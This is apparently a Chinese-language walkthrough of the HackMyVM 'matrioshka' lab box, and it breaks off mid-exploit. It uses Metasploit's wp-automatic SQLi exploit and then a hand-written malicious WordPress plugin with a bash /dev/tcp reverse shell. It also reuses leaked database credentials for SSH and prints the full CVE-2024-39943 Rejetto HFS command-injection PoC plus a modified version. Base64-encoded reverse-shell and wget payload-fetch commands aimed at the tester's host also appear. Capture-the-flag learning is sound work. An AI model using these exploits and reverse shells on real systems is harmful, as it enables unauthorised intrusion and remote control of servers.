 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/61337d2d-d15a-45f2-b730-fc034eb3cd31
 |
 | [!] Title: Ultimate Member < 2.11.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
 |     Fixed in: 2.11.1
 |     References:
 |      - https://wpscan.com/vulnerability/71513392-aebb-4a11-bf48-4833a7267d5b
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13220
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c06548-238d-4b75-8f20-d7de6fc21539
 |
 | Version: 2.8.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt

[+] wp-automatic
 | Location: http://mamushka.hmv/wp-content/plugins/wp-automatic/
 | Latest Version: 3.130.0
 | Last Updated: 2026-01-18T12:55:56.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/wp-automatic/, status: 200
 |
 | [!] 9 vulnerabilities identified:
 |
 | [!] Title: Automatic 2.0.3 - csv.php q Parameter SQL Injection
 |     Fixed in: 2.0.4
 |     References:
 |      - https://wpscan.com/vulnerability/dadc99ca-54ee-42b4-b247-79a47b884f03
 |      - https://www.exploit-db.com/exploits/19187/
 |      - https://packetstormsecurity.com/files/113763/
 |
 | [!] Title: WordPress Automatic < 3.53.3 - Unauthenticated Arbitrary Options Update
 |     Fixed in: 3.53.3
 |     References:
 |      - https://wpscan.com/vulnerability/4e5202b8-7317-4a10-b9f3-fd6999192e15
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4374
 |      - https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/
 |
 | [!] Title: Automatic < 3.92.1 - Cross-Site Request Forgery to Privilege Escalation
 |     Fixed in: 3.92.1
 |     References:
 |      - https://wpscan.com/vulnerability/fa2f3687-7a5f-4781-8284-6fbea7fafd0e
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27955
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/12adf619-4be8-4ecf-8f67-284fc44d87d0
 |
 | [!] Title: Automatic < 3.92.1 - Unauthenticated Arbitrary File Download and Server-Side Request Forgery
 |     Fixed in: 3.92.1
 |     References:
 |      - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/620e8931-64f0-4d9c-9a4c-1f5a703845ff
 |
 | [!] Title: Automatic < 3.92.1 - Unauthenticated SQL Injection
 |     Fixed in: 3.92.1
 |     References:
 |      - https://wpscan.com/vulnerability/53a51e79-a216-4ca3-ac2d-57098fd2ebb5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27956
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/a8b319be-f312-4d02-840f-e2a91c16b67a
 |
 | [!] Title: WordPress Automatic Plugin < 3.93.0 Cross-Site Request Forgery
 |     Fixed in: 3.93.0
 |     References:
 |      - https://wpscan.com/vulnerability/e5d0dcec-41a7-40ae-b9ce-f839de9c28b8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32693
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/6231e47e-2120-4746-97c1-2aa80aa18f4e
 |
 | [!] Title: WordPress Automatic < 3.95.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via autoplay Parameter
 |     Fixed in: 3.95.0
 |     References:
 |      - https://wpscan.com/vulnerability/d0198310-b323-476a-adf8-10504383ce1c
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4849
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/4be58bfa-d489-45f5-9169-db8bab718175
 |
 | [!] Title: WordPress Automatic Plugin - AI content generator and auto poster plugin < 3.116.0 - Authenticated (Author+) Arbitrary File Upload
 |     Fixed in: 3.116.0
 |     References:
 |      - https://wpscan.com/vulnerability/33c09e34-517c-4529-8538-e75cc96460bd
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5395
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/57be67fd-8485-495f-b5e9-6eb52af945b7
 |
 | [!] Title: WordPress Automatic Plugin - AI content generator and auto poster plugin < 3.119.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
 |     Fixed in: 3.119.0
 |     References:
 |      - https://wpscan.com/vulnerability/d1492e08-59cc-4ae8-ac04-6cf2bfde2898
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6247
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/95d68a5d-4d0b-4030-a80a-ada31b118af2
 |
 | The version could not be determined.

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 6
 | Requests Remaining: 19

[+] Finished: Fri Jan 23 20:38:34 2026
[+] Requests Done: 116303
[+] Cached Requests: 22
[+] Data Sent: 31.13 MB
[+] Data Received: 16.122 MB
[+] Memory used: 448.398 MB
[+] Elapsed time: 00:02:29

由于Ultimate Member不方便利用，需要尝试利用wp-automatic漏洞

漏洞利用

msfconsole

┌──(web)─(root㉿kali)-[/home/kali]
└─# msfconsole                  
Metasploit tip: Use the resource command to run commands from a file
                                                  
               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:                                
                                :::::::+:
                      Metasploit

       =[ metasploit v6.4.69-dev                          ]
+ -- --=[ 2529 exploits - 1302 auxiliary - 432 post       ]
+ -- --=[ 1678 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search wordpress ultimate

Matching Modules
================

   #  Name                                                    Disclosure Date  Rank    Check  Description
   -  ----                                                    ---------------  ----    -----  -----------
   0  auxiliary/gather/wp_ultimate_csv_importer_user_extract  2015-02-02       normal  Yes    WordPress Ultimate CSV Importer User Table Extract
   1  auxiliary/scanner/http/wp_ultimate_member_sorting_sqli  2024-02-10       normal  No     WordPress Ultimate Member SQL Injection (CVE-2024-1071)


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/wp_ultimate_member_sorting_sqli                                        

msf6 > search wp_automatic

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  auxiliary/admin/http/wp_automatic_plugin_privesc  2021-09-06       normal     Yes    WordPress Plugin Automatic Config Change to RCE
   1  exploit/multi/http/wp_automatic_sqli_to_rce       2024-03-13       excellent  Yes    WordPress wp-automatic Plugin SQLi Admin Creation
   2    \_ target: PHP In-Memory                        .                .          .      .
   3    \_ target: Unix/Linux Command Shell             .                .          .      .
   4    \_ target: Windows Command Shell                .                .          .      .


Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_automatic_sqli_to_rce                                                   
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'

_member_sorting_sqli) > use exploit/multi/http/wp_automatic_sqli_to_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set RHOSTS mamushka.hmv
RHOSTS => mamushka.hmv
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set SSL false
SSL => false
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set TARGETURI /
TARGETURI => /

msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > show options

Module options (exploit/multi/http/wp_automatic_sqli_to_rce):

   Name       Current Sett  Required  Description
              ing
   ----       ------------  --------  -----------
   EMAIL      shanti.heath  no        Email for the ne
              cote@borer-a            w user
              rmstrong.exa
              mple
   PASSWORD   WuuPjjP8sUTT  no        Password for the
              68                       new user
   Proxies                  no        A proxy chain of
                                       format type:hos
                                      t:port[,type:hos
                                      t:port][...]. Su
                                      pported proxies:
                                       socks5, socks5h
                                      , http, sapni, s
                                      ocks4
   RHOSTS     mamushka.hmv  yes       The target host(
                                      s), see https://
                                      docs.metasploit.
                                      com/docs/using-m
                                      etasploit/basics
                                      /using-metasploi
                                      t.html
   RPORT      80            yes       The target port
                                      (TCP)
   SSL        false         no        Negotiate SSL/TL
                                      S for outgoing c
                                      onnections
   TARGETURI  /             yes       The base path to
                                       the wordpress a
                                      pplication
   USERNAME   rolando       no        Username to crea
                                      te
   VHOST                    no        HTTP server virt
                                      ual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setti  Required  Description
          ng
   ----   -------------  --------  -----------
   LHOST  192.168.0.108  yes       The listen address
                                   (an interface may b
                                   e specified)
   LPORT  4444           yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP In-Memory



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > exploit
[*] Started reverse TCP handler on 192.168.0.108:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting SQLi test to verify vulnerability...
[+] The target is vulnerable. Target is vulnerable to SQLi!
[-] Exploit aborted due to failure: unexpected-reply: Failed to log in to WordPress admin.
[*] Exploit completed, but no session was created.

最终的预期是反弹shell的，不过当上传payload的时候会失败，因为新版的wordpress是不允许上传php文件

不过好在他成功创建了管理员账户rolando:WuuPjjP8sUTT68

尝试登录一下，可以成功登录

提权

上传恶意插件

我们可以尝试通过添加插件的访问获取反弹shell

Wordpress - HackTricks plugins#plugin-rce)

wetw0rk/malicious-wordpress-plugin: Simply generates a wordpress plugin that will grant you a reverse shell once uploaded. I recommend installing Kali Linux, as msfvenom is used to generate the payload.

或者可以尝试手动写一个恶意php，压缩成zip文件即可

❯ vi rev.php
<?php
/**
 * Plugin Name: GetRev
 * Version: 10.8.1
 * Author: PwnedSauce
 * Author URI: http://PwnedSauce.com
 * License: GPL2
 */
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.108/4444 0>&1'")
?>
❯ zip rev.zip rev.php
  adding: rev.php (deflated 14%)

(remote) www-data@3ed5ddfe0e0c:/home$ env
HISTCONTROL=ignorespace
HOSTNAME=3ed5ddfe0e0c
PHP_VERSION=8.2.22
APACHE_CONFDIR=/etc/apache2
PHP_INI_DIR=/usr/local/etc/php
GPG_KEYS=39B641343D8C104B2B146DC3F9C39DC0B9698544 E60913E4DF209907D8E30D96659A97C9CF2A795A 1198C0117593497A5EC5C199286AF1F9897469DC
PHP_LDFLAGS=-Wl,-O1 -pie
PWD=/home
APACHE_LOG_DIR=/var/log/apache2
LANG=C
PHP_SHA256=8566229bc88ad1f4aadc10700ab5fbcec81587c748999d985f11cf3b745462df
APACHE_PID_FILE=/var/run/apache2/apache2.pid
WORDPRESS_DB_HOST=db
PHPIZE_DEPS=autoconf            dpkg-dev               file             g++             gcc             libc-dev                make            pkg-config             re2c
TERM=xterm-256color
PHP_URL=https://www.php.net/distributions/php-8.2.22.tar.xz
APACHE_RUN_GROUP=www-data
APACHE_LOCK_DIR=/var/lock/apache2
SHLVL=3
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
WORDPRESS_DB_PASSWORD=Fukurokuju
APACHE_RUN_DIR=/var/run/apache2
PS1=$(command printf "\[\033[01;31m\](remote)\[\033[0m\] \[\033[01;33m\]$(whoami)@$(hostname)\[\033[0m\]:\[\033[1;36m\]$PWD\[\033[0m\]\$ ")
APACHE_ENVVARS=/etc/apache2/envvars
APACHE_RUN_USER=www-data
WORDPRESS_DB_USER=matrioska
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
WORDPRESS_DB_NAME=wordpressdb
PHP_ASC_URL=https://www.php.net/distributions/php-8.2.22.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
_=/usr/bin/env
OLDPWD=/

提权-matrioshka

你是 www-data
环境是 Docker（HOSTNAME=3ed5ddfe0e0c）
数据库账号+密码已经白送到你 env 里
WordPress 是 完整可控态

WORDPRESS_DB_HOST=db
WORDPRESS_DB_NAME=wordpressdb
WORDPRESS_DB_USER=matrioska
WORDPRESS_DB_PASSWORD=Fukurokuju

尝试ssh密码复用登录失败了

发现matrioska和靶机题目差了个h，补全

┌──(web)─(root㉿kali)-[/home/kali]
└─# ssh matrioshka@192.168.0.105
matrioshka@192.168.0.105's password: 
Linux matrioshka 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Aug 22 19:12:21 2024 from 10.0.2.8
matrioshka@matrioshka:~$

提权-root

查suid

matrioshka@matrioshka:~$ find / -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/mount

sudo -l

matrioshka@matrioshka:~$ sudo -l
[sudo] password for matrioshka: 
Sorry, user matrioshka may not run sudo on matrioshka.

监听端口

matrioshka@matrioshka:~$ ss -lntup
Netid  State   Recv-Q   Send-Q     Local Address:Port              Peer Address:Port          Process           
udp    UNCONN  0        0                0.0.0.0:68                     0.0.0.0:*                               
tcp    LISTEN  0        128              0.0.0.0:22                     0.0.0.0:*                               
tcp    LISTEN  0        4096           127.0.0.1:38973                  0.0.0.0:*                               
tcp    LISTEN  0        4096           127.0.0.1:8080                   0.0.0.0:*                               
tcp    LISTEN  0        4096           127.0.0.1:9090                   0.0.0.0:*                               
tcp    LISTEN  0        128                 [::]:22                        [::]:*                               
tcp    LISTEN  0        511                    *:80                           *:*

matrioshka@matrioshka:~$ ps aux | grep -E "8080|9090|38973" | grep -v grep
root         910  0.4  0.8 1303940 17144 ?       Sl   20:14   0:14 /usr/sbin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8080 -container-ip 172.18.0.3 -container-port 80
root        1527  0.0  0.7 1156220 14960 ?       Sl   20:14   0:00 /usr/sbin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 9090 -container-ip 172.19.0.2 -container-port 80

👉 这不是普通服务，这是：

宿主机 root 把两个 Docker 容器的 Web 服务“只映射到 localhost”

也就是说：

你现在 以 matrioshka 身份
可以直接访问 root 暴露的内部 Docker 管理 Web
不需要 docker 组
不需要 sudo
不需要内核漏洞

这是 HMV 的标准“docker → root”终局设计

目标-Web 服务

不是宿主机了，而是这两个容器里的 Web 服务本身：

本地端口	容器 IP	说明
8080	172.18.0.3	Web 服务 A
9090	172.19.0.2	Web 服务 B

👉** 其中至少一个容器 = root 挂载宿主 /var/run/docker.sock 或敏感目录**

matrioshka@matrioshka:~$ curl -v http://127.0.0.1:8080
curl -v http://127.0.0.1:9090
*   Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET / HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.88.1
> Accept: */*
> 
< HTTP/1.1 301 Moved Permanently
< Date: Sat, 24 Jan 2026 02:07:48 GMT
< Server: Apache/2.4.61 (Debian)
< X-Powered-By: PHP/8.2.22
< X-Redirect-By: WordPress
< Location: http://127.0.0.1/
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host 127.0.0.1 left intact
*   Trying 127.0.0.1:9090...
* Connected to 127.0.0.1 (127.0.0.1) port 9090 (#0)
> GET / HTTP/1.1
> Host: 127.0.0.1:9090
> User-Agent: curl/7.88.1
> Accept: */*
> 
< HTTP/1.1 200 OK
< Vary: Accept-Encoding
< server: HFS 0.52.9 2024-06-11T12:54:37.285Z
< etag: 
< Cache-Control: no-store, no-cache, must-revalidate
< Content-Type: text/html; charset=utf-8
< Content-Length: 1763
< Date: Sat, 24 Jan 2026 02:07:58 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
< 
<!DOCTYPE html>
<html>
  <head>
                    
                        <title>File server</title>
                        <link rel="shortcut icon" href="/favicon.ico?0" />
                    
                    <script>
                    HFS = {
    "VERSION": "0.52.9",
    "API_VERSION": 8.72,
    "SPECIAL_URI": "/~/",
    "PLUGINS_PUB_URI": "/~/plugins/",
    "FRONTEND_URI": "/~/frontend/",
    "session": {
        "username": "",
        "exp": "2026-01-25T02:07:58.421Z"
    },
    "plugins": {},
    "prefixUrl": "",
    "dontOverwriteUploading": true,
    "customHtml": {},
    "file_menu_on_link": true,
    "tile_size": 0,
    "sort_by": "name",
    "invert_order": false,
    "folders_first": true,
    "sort_numerics": false,
    "theme": "",
    "auto_play_seconds": 5,
    "lang": {}
}
                    document.documentElement.setAttribute('ver', '0.52.9')
                    </script>
                
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=0" />
    <link href="/~/frontend/fontello.css" rel="stylesheet" />
    <script type="module" crossorigin src="/~/frontend/assets/index-Uv-vNCsJ.js"></script>
    <link rel="stylesheet" crossorigin href="/~/frontend/assets/index-Bnwe3ltN.css">
  </head>
  <body>
                    
                    <style>
                    :root {
                        
                    }
                    </style>
                    
                    
                
    <noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root"></div>
    <script nomodule>document.getElementById('root').innerText = "Please use a newer browser"</script>
  </body>
</html>
* Connection #0 to host 127.0.0.1 left intact

8080 端口
WordPress，返回 301 重定向到 http://127.0.0.1/
说明：只是普通 WordPress，没有直接暴露管理 API 或命令执行接口
目前不能直接从这里拿到 root shell
9090 端口
返回了 HFS 0.52.9 文件服务器（HTTP File Server）
特点：
- 内置 Web 文件管理
- /~/ API 可能存在文件上传或管理接口
- 很可能没有认证（你看到 "username": ""，session 为空）

9090 是 HFS 0.52.9（Rejetto 新版 Node.js 重写）

这不是老的 HFS 2.x（CVE-2014-6287 那一套）
👉 所以：

❌ /~/upload 直传 ≠ 一定存在
❌ /~/exec 这种老接口 ≠ 存在
❌ Metasploit 里 hfs_exec 那个模块 一定打不通

SSH 本地端口转发

ssh -L 7777:127.0.0.1:9090 matrioshka@192.168.0.105

尝试利用弱密码去登录，发现凭证就是admin:admin

得知文件服务器是HFS 0.52.9版本

搜寻一下有无版本漏洞

jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS: Unauthenticated RCE Flaw in Rejetto HTTP File Server (CVE-2024-23692)

https://github.com/Y5neKO/Y5_VulnHub/tree/main/HFS/CVE-2024-39943-Poc-main

在CVE-2024-23692的POC虽然可以监测到含有漏洞，但无法成功利用

然而利用CVE-2024-39943可以通过身份验证后执行任意命令

CVE-2024-39943

✅ 只下载 poc.py
wget https://raw.githubusercontent.com/Y5neKO/Y5_VulnHub/main/HFS/CVE-2024-39943-Poc-main/poc.py
或用 curl：
curl -O https://raw.githubusercontent.com/Y5neKO/Y5_VulnHub/main/HFS/CVE-2024-39943-Poc-main/poc.py

✅ 只下载 config.yaml
wget https://raw.githubusercontent.com/Y5neKO/Y5_VulnHub/main/HFS/CVE-2024-39943-Poc-main/config.yaml

✅ 下载 hfs-linux.zip
这个是二进制，必须 raw 链接，否则会下成 HTML：
wget https://raw.githubusercontent.com/Y5neKO/Y5_VulnHub/main/HFS/CVE-2024-39943-Poc-main/hfs-linux.zip

解压：
unzip hfs-linux.zip
chmod +x hfs

✅ 下载 README.md
wget https://raw.githubusercontent.com/Y5neKO/Y5_VulnHub/main/HFS/CVE-2024-39943-Poc-main/README.md

┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/CVE-2024-39943-Poc-main]
└─# python poc.py
Url: http://127.0.0.1:7777/
Cookie: hfs_http=eyJ1c2VybmFtZSI6ImFkbWluIiwiaXAiOiIxNzIuMTkuMC4xIiwiX2V4cGlyZSI6MTc2OTMwODkxNTcwMCwiX21heEFnZSI6ODY0MDAwMDB9; hfs_http.sig=QbVN3mahV5vTUOHKnRCKvSPF6kQ
Ip: 127.0.0.1
Port: 9999
Step 1 add vfs
Step 2 set permission vfs
Step 3 create folder
Step 4 execute payload

┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/CVE-2024-39943-Poc-main]
└─# cat poc.py
import requests as req
import base64

url = input("Url: ")
cookie = input("Cookie: ")
ip = input("Ip: ")
port = input("Port: ")

headers = {"x-hfs-anti-csrf":"1","Cookie":cookie}

print("Step 1 add vfs")
step1 = req.post(url+"~/api/add_vfs", headers=headers, json={"parent":"/","source":"/tmp"})

print("Step 2 set permission vfs")
step2 = req.post(url+"~/api/set_vfs", headers=headers, json={"uri":"/tmp/","props":{"can_see":None,"can_read":None,"can_list":None,"can_upload":"*","can_delete":None,"can_archive":None,"source":"/tmp","name":"tmp","type":"folder","masks":None}})

print("Step 3 create folder")
command = "ncat {0} {1} -e /bin/bash".format(ip,port)
command = command.encode('utf-8')
payload = 'poc";python3 -c "import os;import base64;os.system(base64.b64decode(\''+base64.b64encode(command).decode('utf-8')+"'))"
step3 = req.post(url+"~/api/create_folder", headers=headers, json={"uri":"/tmp/","name":payload})

print("Step 4 execute payload")
step4 = req.get(url+"~/api/get_ls?path=/tmp/"+payload, headers=headers)

监听端口，然而并不触发

为什么 `ncat -e` 不触发

在这个 HFS 场景里：

RCE 发生在 Node.js child_process.execSync
执行环境是 非交互 shell
ncat -e /bin/bash 很容易因为：
- TTY 不存在
- seccomp / busybox / netcat 变种
- stdout / stderr 被 HFS 吃掉
  👉 直接失败但不报错

修改后的稳定版 PoC 结构（推荐）

✅ 思路

不在脚本里拼命令
只负责：
把 base64 解码后丢给 shell 执行

✅ 代码

import requests as req

url = input("Url: ")
cookie = input("Cookie: ")
cmd_b64 = input("Base64Cmd: ")

headers = {
    "x-hfs-anti-csrf": "1",
    "Cookie": cookie
}

print("[+] Step 1 add vfs")
req.post(url + "~/api/add_vfs",
         headers=headers,
         json={"parent": "/", "source": "/tmp"})

print("[+] Step 2 set vfs permission")
req.post(url + "~/api/set_vfs",
         headers=headers,
         json={
             "uri": "/tmp/",
             "props": {
                 "can_upload": "*",
                 "source": "/tmp",
                 "name": "tmp",
                 "type": "folder"
             }
         })

print("[+] Step 3 create malicious folder")

payload = (
    'poc";'
    'python3 -c "import os,base64;'
    'os.system(base64.b64decode(\'%s\').decode())'
    '"'
) % cmd_b64

req.post(url + "~/api/create_folder",
         headers=headers,
         json={"uri": "/tmp/", "name": payload})

print("[+] Step 4 trigger execution")
req.get(url + "~/api/get_ls?path=/tmp/" + payload,
        headers=headers)

print("[+] Done")

┌──(web)─(root㉿kali)-[/home/kali]
└─# echo 'bash -i >& /dev/tcp/192.168.0.108/9999 0>&1' |base64       
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA4Lzk5OTkgMD4mMQo=

┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/CVE-2024-39943-Poc-main]
└─# python new_poc.py
Url: http://127.0.0.1:7777/
Cookie: hfs_http=eyJ1c2VybmFtZSI6ImFkbWluIiwiaXAiOiIxNzIuMTkuMC4xIiwiX2V4cGlyZSI6MTc2OTMwODkxNTcwMCwiX21heEFnZSI6ODY0MDAwMDB9; hfs_http.sig=QbVN3mahV5vTUOHKnRCKvSPF6kQ
Base64Cmd: YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA4Lzk5OTkgMD4mMQo=
[+] Step 1 add vfs
[+] Step 2 set vfs permission
[+] Step 3 create malicious folder
[+] Step 4 trigger execution
[+] Done

直接反弹shell失败了

matrioshka@matrioshka:/tmp$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:41:3c:f7 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.105/24 brd 192.168.0.255 scope global dynamic enp0s3
       valid_lft 4077sec preferred_lft 4077sec
    inet6 fe80::a00:27ff:fe41:3cf7/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:f3:47:75:e8 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
5: br-1f21cf17cc68: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:66:a5:ea:28 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-1f21cf17cc68
       valid_lft forever preferred_lft forever
    inet6 fe80::42:66ff:fea5:ea28/64 scope link 
       valid_lft forever preferred_lft forever
9: veth6369dce@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-1f21cf17cc68 state UP group default 
    link/ether d2:a8:b2:77:27:52 brd ff:ff:ff:ff:ff:ff link-netnsid 2
    inet6 fe80::d0a8:b2ff:fe77:2752/64 scope link 
       valid_lft forever preferred_lft forever
11: veth854363d@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-1f21cf17cc68 state UP group default 
    link/ether 06:55:63:ea:7e:e6 brd ff:ff:ff:ff:ff:ff link-netnsid 1
    inet6 fe80::455:63ff:feea:7ee6/64 scope link 
       valid_lft forever preferred_lft forever
12: br-457d4131991d: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:9e:d7:38:7e brd ff:ff:ff:ff:ff:ff
    inet 172.19.0.1/16 brd 172.19.255.255 scope global br-457d4131991d
       valid_lft forever preferred_lft forever
    inet6 fe80::42:9eff:fed7:387e/64 scope link 
       valid_lft forever preferred_lft forever
14: veth1f5b280@if13: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-457d4131991d state UP group default 
    link/ether 0e:dd:18:f4:8e:14 brd ff:ff:ff:ff:ff:ff link-netnsid 3
    inet6 fe80::cdd:18ff:fef4:8e14/64 scope link 
       valid_lft forever preferred_lft forever

1️⃣ 宿主真实网卡

enp0s3 → 192.168.0.105/24

这是 你 SSH 进来的那台 VM 的对外 IP

2️⃣ Docker bridge（重点）

你有 三个 bridge：

docker0          → 172.17.0.1
br-1f21cf17cc68  → 172.18.0.1
br-457d4131991d  → 172.19.0.1   ← ★★★

而你前面已经确认过：

docker-proxy
container-ip: 172.19.0.2

👉 HFS 就跑在 **br-457d4131991d** 这个网络里

也就是说：

💥 payload 实际执行位置 = 172.19.0.2 这个容器

matrioshka@matrioshka:~$ vi rev.sh
/bin/bash -i >& /dev/tcp/172.19.0.1/4444 0>&1
matrioshka@matrioshka:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
172.19.0.2 - - [09/Mar/2025 09:36:58] "GET /rev.sh HTTP/1.1" 200 -

wget 172.17.0.1:8000/rev.sh -O /tmp/rev.sh
┌──(web)─(root㉿kali)-[/home/kali]
└─# echo 'wget 172.17.0.1:8000/rev.sh -O /tmp/rev.sh' |base64
d2dldCAxNzIuMTcuMC4xOjgwMDAvcmV2LnNoIC1PIC90bXAvcmV2LnNoCg==

┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/CVE-2024-39943-Poc-main]
└─# python new_poc.py
Url: http://127.0.0.1:7777/
